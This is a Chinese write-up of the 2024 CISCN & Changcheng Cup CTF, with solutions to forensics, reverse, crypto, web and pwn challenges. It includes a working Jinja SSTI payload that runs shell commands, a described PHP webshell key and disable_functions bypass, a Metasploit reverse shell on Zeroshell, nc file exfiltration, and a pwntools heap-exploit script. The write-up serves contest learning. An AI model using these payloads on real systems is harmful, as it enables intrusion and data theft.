SfTian 2024 CISCN&长城杯 WP # 2024 CISCN&长城杯 WP > 人民的好比赛 ## 01 zeroshell_1 ### 操作内容: 把拿来的压缩包解压有个流量包分析有个http包的referer内容是base64,用厨子解密就是flag  ### flag值: flag{6C2E38DA-D8E4-8D84-4A4F-E2ABD07A1F3A} ## 02 zeroshell_2 ### 操作内容: Zeroshell 3.9.0有CVE,用exploit-db的rb配合msfconsole反弹shell在/Database中找到flag  ### flag值: flag{c6045425-6e6e-41d0-be09-95682a4f65c4} ## 03 zeroshell_3 ### 操作内容: Netstat -lnp找到有一个202开头的IP  ### flag值: flag{202.115.89.103} ## 04 zeroshell_4 ### 操作内容: 在/Database目录ls -al可以看到有个.nginx  ### flag值: flag{.nginx} ## 05 zeroshell_5 ### 操作内容: 此处用nc ncIP nc端口 < .nginx 当作stdin在接收端打开nc -lnvp 端口 > back当作stdout即可拿到二进制文件,拖到ida中能直接找到明文密钥  ### flag值: flag{11223344qweasdzxc} ## 06 zeroshell_6 ### 操作内容: 运行.nginx之后在/tmp会有循环进程保活,那么就会引用到.nginx,利用grep搜索之后可以看到保活脚本(最后在/var找到了)grep -r ".nginx" /var  ### flag值: flag{/var/register/system/startup/scripts/nat/File} ## 07 WinFT_1 ### 操作内容: Powershell直接netstat -ant参考截图  ### flag值: flag{miscsecure.com:192.168.116.130:443} ## 08 WinFT_2 ### 操作内容: 在计划任务,如下图   ### flag值: flag{AES_encryption_algorithm_is_an_excellent_encryption_algorithm} 09 WinFT_5 ### 操作内容: 流量包有个server大小比较大,直接foremost分离出来一个zip,密码碰巧是描述里面的base64  ### flag值: flag{a1b2c3d4e5f67890abcdef1234567890-2f4d90a1b7c8e2349d3f56e0a9b01b8a-CBC} ## 09 WinFT_5 ### 操作内容: 流量包有个server大小比较大,直接foremost分离出来一个zip,密码碰巧是描述里面的base64  ### flag值: flag{a1b2c3d4e5f67890abcdef1234567890-2f4d90a1b7c8e2349d3f56e0a9b01b8a-CBC} ## 10 sc05_1 ### 操作内容: 凭感觉推断(运气好罢了)在2024/11/09 16:22:42处有2个同时建立的连接,有一个连接到美国,md5加密一下就出来了 ### flag值: flag{01df5bc2388e287d4cc8f11ea4d31929} ## 11 ezCsky ### 操作内容: 拖入IDA用arm处理器打开,可以在栈空间贴脸看到一个testkey,向上翻还有个rc4_crypt   左侧有xor函数,跳转到You enter a true flag!可以看到下方的大端序即为密文  由于不知道xor逻辑,只能各种尝试,最终发现是倒序xor ```python from Crypto.Cipher import ARC4 key = b"testkey" enc = [0x96, 0x8F, 0xB8, 0x08, 0x5D, 0xA7, 0x68, 0x44, 0xF2, 0x64, 0x92, 0x64, 0x42, 0x7A, 0x78, 0xE6, 0xEA, 0xC2, 0x78, 0xB8, 0x63, 0x9E, 0x5B, 0x3D, 0xD9, 0x28, 0x3F, 0xC8, 0x73, 0x06, 0xEE, 0x6B, 0x8D, 0x0C, 0x4B, 0xA3, 0x23, 0xAE, 0xCA, 0x40, 0xED, 0xD1] res = ARC4.new(key) flag = res.decrypt(bytes(enc)) flag = bytearray(flag) for i in range(len(flag) - 1, 0 ,-1): flag[i-1] ^= flag[i] print(flag) ``` ### flag值: flag{d0f5b330-9a74-11ef-9afd-acde48001122} ## 12 Safe_Proxy ### 操作内容: 使用fenjing进行ssti模板注入。Payload为: 使用post传入参数:  ``` code={%25set+gl%3d'_'*2%2b'globals'%2b'_'*2%25}{%25set+bu%3d'_'*2%2b'builtins'%2b'_'*2%25}{%25set+im%3d'_'*2%2b'i''mport'%2b'_'*2%25}{%25set+hc%3d'so'[%3a%3a-1]%25}{{g.pop[gl][bu][im](hc)['p''open']('cat+/f*>>app.py').read()}} ``` 将flag文件打印在app.py页面的尾部。 重新访问app.py即可获得flag。  ### flag值: flag{3bccc0f4-dfca-43be-93ba-4a2c587bb230} ## 13 hello_web ### 操作内容: 请无视本页面下面的文字 SSd2ZSBsZXQgeW91IGlnbm9yZSB0aGlzIHBhcmFncmFwaC4= Base加密为:I've let you ignore this paragraph. 那么本页面一定存在提示。F12查看源码可以发现有两个页面,一个是hackme.php另一个是提示。使用文件包含的方式读取这两个文件,会发现一个是php文件另一个是phpinfo文件。分析php文件可以发现,这是一个混淆马,进行仔细分析解密可知,内层解密函数为:@eval($_POST['cmd[66.99']); 尝试可以发现,连接密钥是cmd[66.99  使用蚁剑进行连接,发现可以连接,但无法执行命令。根据phpinfo提示,发现是disable_functions禁用了大量的命令执行函数。使用蚁剑的disable_functions插件直接绕过即可执行命令。使用find命令进行全局查找flag。Find / -name “flag” 直接读取flag即可。 ### flag值: flag{7fa13711-118e-46ba-97c0-1d412e0d9128} ## 14 fffffhash ### 操作内容: Github发现原题: https://github.com/DownUnderCTF/Challenges_2023_Public/blob/main/crypto/fnv/solve/solution_joseph_LLL.sage 直接改下数据进行解密即可。得到020101081b04390001051a020a3d0f0f进行校验。即可得到flag。  ### flag值: flag{7ba210c2-f03b-4c48-b5d3-c523f20dd078} ## 15 rasnd ### 操作内容: 加密分为两个过程。 1. crypto1() 直接用暴力循环找到合适的 x1 和 x2,使得计算出的 A 和 n 的最大公约数为素数,从而推断出模数 n 的两个素因子 p 和 q。然后利用这两个素因子计算私钥指数 d,得到前半段flag。 2. crypto2() 先用z3解方程,得到p和q。下面就是最基础的rsa加密算法的解密过程了。求出私钥d然后使用私钥d进行解后半段flag。 ```python from Crypto.Util.number import * from tqdm import trange n = 18525513846506175831563759729334399107321460844233190994505090498783093351218530201460704018557718111910673563688865854955581238994847476035163061047080472844913738288191312241552652474564445302264853029924473499855798791895312908454274485506859061410335361020340776516523941545295495868148602830773643381026875615116114542987487721476433319065336287426267130761480149666380372502030176504260183872783044582472269370191940246989122422751136739615150004325135453824753194384675391111774569167783712462987269409467429479975117050818132845256522076975610334620671183269663182420173716768424637453841150288101932060282283 c = 12092565061875126203146777419524136209293991008847517402367020050067538584421589817896823780450281632257888908525282005401908471053590578919304330901227398490964076046082605352067571504589311506387879145663200685627203086383618876385605299802465546763321856181104635248909007918883511842314387859167479153141071518807976310800715800912922434598966639864227351934779100082251869201327419635778335845542734204635212776352380693446974665264431424098740050582266977513900719650125894714642363459340749031503451895968021061519344479725422682328308860148967765021704752730969629515036468587706756828693721479809573953211546 hint1 = 2117789396284928955538494629631830279901722075033344485242708796186506061701545362910544780349396590511342342718717569060549269313648469145642279444412904836667483251061673671890825127651416884926163439778819049928663917725126750595616039237178509344130451335391573262418766865178758129361354714489989500910936378069324756437725394481358310486 hint2 = 46121617974271967295736135112108716088905050360890819930061863458876456744303751629131134572211333291140404662021435889585110481641631066780733392452056644837591340160196351753203344592866475775323730060605004624386976329104900761858010706810631187690819400479350763557994471428570772169051962332816193904205416366733136879488772782088175485170448040123098716142380888785303020040810614219283904840800722864380060942399013241389546657840464823687291133552909223 for x1 in trange(2**11): for x2 in range(2**11): A = x2 * (hint1 + 0x114) - x1 * (hint2 + 0x514) if isPrime(GCD(A, n)): p = GCD(A, n) q = n // p d = inverse(0x10001, (p - 1) * (q - 1)) print(long_to_bytes(pow(c, d, n))) from Crypto.Util.number import * n = 14581302691212555916083278502439645397238041370035475406126779344600639511143637322640320059430681830741413923894847426573750476698631629568629943135933920419347385832842354697374392989498131828072255450489481812778462977795579457613927824857209254566726209492511234506015225747956122726427272833154780220922151818667181643912754901418400655002805374255806121525842789597175219371921475576854225287577771787933982552125308158761528067432089549432127334340794790636977802392329593399162215706992811893095544527916459441198849281399851917775639982097051030136092694673405355827098368834474621264863247192824991842196297 c = 7954440013989245337910262430666287958436558133407459521845218063677314992811762649775906648010196422215021709717265025510455096691766378284665144146974890935553663566707049651117885477633018754683655768376560232158346641475771046990495669325468862166854737396238730263702822647267035153141131892750027678869967403663512868816752965265579970395746897380562512210634391316205808723256530408742805569849728321765600049427135123310821237452488717921455866043199092062704144480995088370641048502818060719065673619630371468661427335404193388562052645963776592754837449601118777623355449397232080478410800515409039281165247 hint = 12768520294607859083739478491354425588086046535894996297736127849435001668613589303105888944036526154850461105541323836773875591747775277021758182627744342384678026282358678053903109701939900236929560121288711856679838848949501610151272181253618726858545924000071463365017696805999401206276483675576263580816343280415962125426066267656836814383033878533310767612179612995463625217364168542747591339975385150641462726311634726990311475198772817439564026165704028636642518327311597477899223257607802992771286324926488802818728414152925384296458068643632845807225606232886858071179561327111145035640807940505391622733429 var('p q') eq1 = 514 * p - 114 * q - inverse_mod(hint, n) eq2 = p * q - n solns = solve([eq1,eq2], p, q, solution_dict=True)[0] p = solns[p] q = solns[q] d = inverse_mod(0x10001, (p-1)*(q-1)) print(long_to_bytes(int(pow(c, d, n)))) ``` ### flag值: flag{bfcab7e9-c9df-4f70-9e1a-b58f5b157c91} ## **16 dump** ### 操作内容: 010查看flag得到enc,由于无法动调,直接.\re.exe flag能得到它跑完程序之后对应的十六进制  那么就可以用这个生成一个顺序a-z A-Z 0-9的字典来对应flag文件里面的十六进制 .\re.exe abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789={} 1e1f202122232425262728292a2b2c2d2e2f303132333435363702030405060708090a0b0c0d0e0f101112131415161718191a1b001c1d0000000000000001 编写脚本之后用字符对应找出来flag,需要自己包裹一下  ```python import base64 import string ans = '23291e24380e1520370e0520000e37121d0f24010139' dic = string.ascii_letters + string.digits+"="+"{}" print(dic) key_dict = "1e1f202122232425262728292a2b2c2d2e2f303132333435363702030405060708090a0b0c0d0e0f101112131415161718191a1b001c1d0000000000000001" flag = '' mapper = {} for i in range(len(dic)): char = dic[i] key = key_dict[i*2:i*2+2] mapper[key] = char for i in range(len(ans) // 2): key = ans[i * 2:i * 2 + 2] if key in mapper: flag += mapper[key] print(flag) ``` ### flag值: flag{MTczMDc9MzQ2Ng==} ## **17 anote** ### 操作内容: 逆天C++但是保护只开了Canary是个堆题,经典利用add edit来搞UAF然后构造一个堆溢出,由于Printf可以直接打印指针泄露内存地址,那么就可以搞到backdoor地址劫持跳转到哪里并用伪造堆块覆盖进而执行任意代码。  ```python from pwn import * context(log_level = 'debug', arch = 'amd64') io = remote('47.94.85.236', 36964) io.sendlineafter(b'Choice>>', b'1') io.sendlineafter(b'Choice>>', b'1') io.sendlineafter(b'Choice>>', b'2') io.sendlineafter(b'index: ', str(0)) io.recvuntil(b'gift: ') heap = int(io.recv(9), 16) print('heap => ' + hex(heap)) io.sendlineafter(b'Choice>>', b'3') io.sendlineafter(b'index: ', str(0)) io.sendlineafter(b'len: ', str(40)) backdoor = 0x80489CE io.sendlineafter(b'content: ', p32(backdoor) + p32(0) * 4 + p32(0x21) + p32(heap + 8)) io.sendlineafter(b'Choice>>', b'3') io.sendlineafter(b'index: ', str(1)) io.sendlineafter(b'len: ', str(40)) io.sendlineafter(b'content: ', p32(heap + 0x8)) io.interactive() ``` ### flag值: flag{43a6ad43-55fb-4a88-bc23-8a3918e7b39c} 取消回复 发表新评论 提交评论
